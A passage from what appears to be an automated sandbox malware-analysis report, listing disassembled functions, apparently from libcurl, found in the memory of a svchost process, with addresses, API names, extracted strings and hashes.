                          • API ID: ErrorLast
                          • String ID:
                          • API String ID: 1452528299-0
                          • Opcode ID: db969aebab7d185ec5007f5fc9c031800bf986f79a105bdd3d72f72b533ac68a
                          • Instruction ID: 62818cd1b7d17db3f71b0e1c47f71af807892c04340bf8b39c1e1862016ff4fd
                          • Opcode Fuzzy Hash: db969aebab7d185ec5007f5fc9c031800bf986f79a105bdd3d72f72b533ac68a
                          • Instruction Fuzzy Hash: 86011B20F0D64282EAB453E4A9E907BA3527F973B4F248738D93D067D7DE6EA841D210
                          Function 00007FFD942F6BD4 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 61ca4c0e3dcf3931f2aa7cc05ab79ab60357bdaf2b011f2860fe107a81363c0e
                          • Instruction ID: f55ee745a369bf43084f771d9b93ab01863fe186b8f558f80a41db9dca1e1242
                          • Opcode Fuzzy Hash: 61ca4c0e3dcf3931f2aa7cc05ab79ab60357bdaf2b011f2860fe107a81363c0e
                          • Instruction Fuzzy Hash: 6121533271864286DB718F98D49077976A0FF86B54F548234EA9D876DAEF3ED401CB00
                          Function 00007FFDA5578740 Relevance: 1.5, APIs: 1, Instructions: 46networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: socket
                          • String ID:
                          • API String ID: 98920635-0
                          • Opcode ID: 8aa9375f29b0daf2dca865736c81f69470b190bb2beb94a81ff9f0b00aa6f106
                          • Instruction ID: fce5637ded3a16b5ae5aff294db754f3c6ed21e580ffd3a6601dc544aea7f416
                          • Opcode Fuzzy Hash: 8aa9375f29b0daf2dca865736c81f69470b190bb2beb94a81ff9f0b00aa6f106
                          • Instruction Fuzzy Hash: AC118936B0964582D754CF26E194329B7A1FB49FA4F088630DB6D17795CF39D491C704
                          Function 00007FFD942E6CC0 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: f801d3189da3d6c7343ef57b350583fa08c8a99c5efbcbdc2bc46658c8b3b4fc
                          • Instruction ID: 5f1aa005410ebfabfee3ce92269b587a30b6c7589aa131888c8b2b3ca4e1c5a6
                          • Opcode Fuzzy Hash: f801d3189da3d6c7343ef57b350583fa08c8a99c5efbcbdc2bc46658c8b3b4fc
                          • Instruction Fuzzy Hash: F6F01254B1920781FEB456E2A5B53B756857F8B780FCCD434D90DC62D3ED2EE580C210
                          Function 00007FFD942E6DA0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(?,?,?,00007FFD942EED8D,?,?,00000000,00007FFD942F19AF,?,?,?,00007FFD942E673F,?,?,?,00007FFD942E6635), ref: 00007FFD942E6DDE
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 34529e8176ea61590ae8271852d7f7c8205af2c373919aa331187e0951f3297b
                          • Instruction ID: 86b2b0c3e476037ae8245de6a1a0699381da9ee8b07ea95555a53156ff2e6620
                          • Opcode Fuzzy Hash: 34529e8176ea61590ae8271852d7f7c8205af2c373919aa331187e0951f3297b
                          • Instruction Fuzzy Hash: 88F0DA10F1920286FA7466E159F12BB11946F867A0FC8C674D92EC62C7EE6EE451C210
                          Function 00007FFDA3386970 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_write_ex
                          • String ID:
                          • API String ID: 4065850298-0
                          • Opcode ID: 5902c466f9c9972f4ae4b4a010122c0e942a01d1c2e6f9b19bc542b2f0a3dfda
                          • Instruction ID: 04c762e056ffd43524ad1eae49075c0e4b58d42f213b094ea90f280d28d2ecb3
                          • Opcode Fuzzy Hash: 5902c466f9c9972f4ae4b4a010122c0e942a01d1c2e6f9b19bc542b2f0a3dfda
                          • Instruction Fuzzy Hash: 0AF0E262B0BA8186EA80EB49D0202EC6352EF84BC4F480431EB4D2B757CE2BC8438300
                          Function 00007FFD942E4E58 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 7b989286f25b60d0532184197740d0a63fa6c9eda64eaec38e8ba5dc223351be
                          • Instruction ID: 0a3f3108a3479d7b5016eaa8e280970442ffb2c15794b69553c4b1c35c09ec76
                          • Opcode Fuzzy Hash: 7b989286f25b60d0532184197740d0a63fa6c9eda64eaec38e8ba5dc223351be
                          • Instruction Fuzzy Hash: 3DE0C271F1E20286FA756AE489A13BF22907F92305F948570E20C462C3DE2FA802C721
                          Function 00007FFDA37766F0 Relevance: 1.3, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: fflushfree
                          • String ID:
                          • API String ID: 1635840800-0
                          • Opcode ID: 69a0ef0fe61d12b7cd644f7225204bcd40b45329cf0d20afb0874d0b4c9b53fe
                          • Instruction ID: 8c5109b1ff8c351d6b799a4e542366906b89eb54a6a6118b4460827032243ce9
                          • Opcode Fuzzy Hash: 69a0ef0fe61d12b7cd644f7225204bcd40b45329cf0d20afb0874d0b4c9b53fe
                          • Instruction Fuzzy Hash: 5B01C431E0A28282EB809F21A4603F832A2EF54FA8F181235DA1D1A3C7CF7E50818354

                          Non-executed Functions

                          Function 00007FFDA558C620 Relevance: 60.0, APIs: 21, Strings: 13, Instructions: 467stringnetworkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLaststrchr$getsocknamememmovestrtoul$_errnobindhtonsinet_ntopinet_pton
                          • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                          • API String ID: 3321035314-3876000827
                          • Opcode ID: d04e1be7d2c0aa2f094f262c23eb51162573f088543dddb53889fb2c3edfc2ae
                          • Instruction ID: 3bd19b835a02dc71252414e01714fde41cecb26ea806e0a7931fbb11e7839a73
                          • Opcode Fuzzy Hash: d04e1be7d2c0aa2f094f262c23eb51162573f088543dddb53889fb2c3edfc2ae
                          • Instruction Fuzzy Hash: F212D22BB0A69A86EB629F2594203B927A1FF47F90F804132DA4D4B797DF3DD501D704
                          Function 00007FFDA55C8570 Relevance: 51.2, APIs: 24, Strings: 5, Instructions: 449COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$malloc
                          • String ID: SSPI: couldn't get auth info$WDigest$digest_sspi: MakeSignature failed, error 0x%08lx$realm$schannel: InitializeSecurityContext failed: %s
                          • API String ID: 2190258309-863418744
                          • Opcode ID: a0be53019b56e209a83083e119f95400405bf67231d4b25d2b4506225da72e2e
                          • Instruction ID: c4328ea93cb6864ef8a2404d46bbacf8f832616e12e015af851d0a86973dbe43
                          • Opcode Fuzzy Hash: a0be53019b56e209a83083e119f95400405bf67231d4b25d2b4506225da72e2e
                          • Instruction Fuzzy Hash: 87227C7AB0AB4A99EB96CF25E8643AD27A4FB46F84F040035DA4D07B96DF3CE444C304
                          Function 00007FFDA55C4530 Relevance: 33.7, APIs: 8, Strings: 11, Instructions: 453stringCOMMON
                          Download Yara Rule
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C45F7
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDA55C4C00
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C50A4
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C50BA
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C50CE
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C50E2
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C50F6
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C510A
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C511E
                            • Part of subcall function 00007FFDA55C5090: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C5132
                            • Part of subcall function 00007FFDA55C55A0: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C55B7
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C55D1
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C55EC
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5608
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5624
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5640
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5658
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5670
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C5688
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C56A0
                            • Part of subcall function 00007FFDA55C55A0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55C56B8
                            • Part of subcall function 00007FFDA55C55A0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C56D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdupfree$callocstrtoul
                          • String ID: (in redirect)$%s://%s$Protocol "%s" %s%s$Switched from HTTP to HTTPS due to HSTS => %s$Too long host name (maximum is %d)$URL rejected: %s$disabled$file$http$https$not supported
                          • API String ID: 3044576692-1310853161
                          • Opcode ID: 0c43f019cf3d2286844168da101a393e0fe631f7b0ae7fc57494f5ebf14f5c62
                          • Instruction ID: 6bd376aa7a5839ce0ccfc2c1bede11c1ff70bd40448f96bd9866981688c2b245
                          • Opcode Fuzzy Hash: 0c43f019cf3d2286844168da101a393e0fe631f7b0ae7fc57494f5ebf14f5c62
                          • Instruction Fuzzy Hash: 1012CD3AB0A78AC2EB5A8E259564BFA6695FF86F85F444031DA1D43783DF3CE450C308
                          Function 00007FFDA55BB790 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 340networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: CreateErrorEventLastcalloc
                          • String ID: Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
                          • API String ID: 853309704-1941740749
                          • Opcode ID: 89116958d5fbd65c511a64a5a93ee8646a0b9384d8c874765f9a1b8ee15a1fbd
                          • Instruction ID: e31ab03c910be8a7cdf9d01da8bfa3fd28757042bdecb9d6f7d53ba755cf0d82
                          • Opcode Fuzzy Hash: 89116958d5fbd65c511a64a5a93ee8646a0b9384d8c874765f9a1b8ee15a1fbd
                          • Instruction Fuzzy Hash: AEF1933AB0A68AC7FB268F2594643BA23A0FB46F94F515135DE4A47796EFBCD040C704
                          Function 00007FFDA55A76B0 Relevance: 25.9, APIs: 17, Instructions: 439networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Event$Select$Eventsfree$EnumNetworkgetsockoptsend$ErrorLastMultipleResetWait
                          • String ID:
                          • API String ID: 2466694130-0
                          • Opcode ID: cc7d6baa13fde0ecc7103c46b7b912e3c8826815b7ac451278061ef639a982f8
                          • Instruction ID: a54b9af96ff67a8ff034be88e3297f00cd7fd6d5c19d3dfd257aedd942fed495
                          • Opcode Fuzzy Hash: cc7d6baa13fde0ecc7103c46b7b912e3c8826815b7ac451278061ef639a982f8
                          • Instruction Fuzzy Hash: 6212353AB2A69A86E7528F25E46437A67A0FB86F44F044431DF8D43B96EF3DD441CB04
                          Function 00007FFDA55A84C0 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 330COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_strdup$fclose
                          • String ID: default$login$macdef$machine$password
                          • API String ID: 800660972-1563471620
                          • Opcode ID: fbc6d4ea616a47d9033cc3a94d8c705e26261f9c14bc9a1516e398696b9ba258
                          • Instruction ID: 0edcbd58bda0112ff51b8791c6fe33a4365bae233d2dc88d1c5c1bb18a4921d1
                          • Opcode Fuzzy Hash: fbc6d4ea616a47d9033cc3a94d8c705e26261f9c14bc9a1516e398696b9ba258
                          • Instruction Fuzzy Hash: BBD1072EB0E28A65FB6B8E15553837A5690AF97F40F480931DF9E037C7DE2EE4448718
                          Function 00007FFDA55CE7A0 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 156encryptionCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: AddressCertHandleModuleNameProcString
                          • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
                          • API String ID: 4138448956-2160583098
                          • Opcode ID: 033d419e88f74dd01258e21aad5c9cf4d5328f7fc238b02a5b643d243729d10b
                          • Instruction ID: 9ec7db35f5ef8d8d511999cd30c8074267b75db988b5de959610944ead044f61
                          • Opcode Fuzzy Hash: 033d419e88f74dd01258e21aad5c9cf4d5328f7fc238b02a5b643d243729d10b
                          • Instruction Fuzzy Hash: 7961B36AB0A68981EB52CF16E4203B977A0FB86F90F544135DE8E07796DF3CE445C708
                          Function 00007FFDA55CB4E0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79encryptionCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyReleasememset
                          • String ID: @
                          • API String ID: 2041421932-2766056989
                          • Opcode ID: a7d61c368b22ca0c88d3533642e75b5fa898f9bad18184ddbdee9bb503b67c68
                          • Instruction ID: 4f4b8888f2802862dd0cc940f76a6f4a1324ff6b4512348a35c0c7238f82961c
                          • Opcode Fuzzy Hash: a7d61c368b22ca0c88d3533642e75b5fa898f9bad18184ddbdee9bb503b67c68
                          • Instruction Fuzzy Hash: CE318B3B71A68982EB60CF22E55476AA7A0FBC9F90F448135EA8D53B95DF3CD4058B04
                          Function 00007FFDA55BD7E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
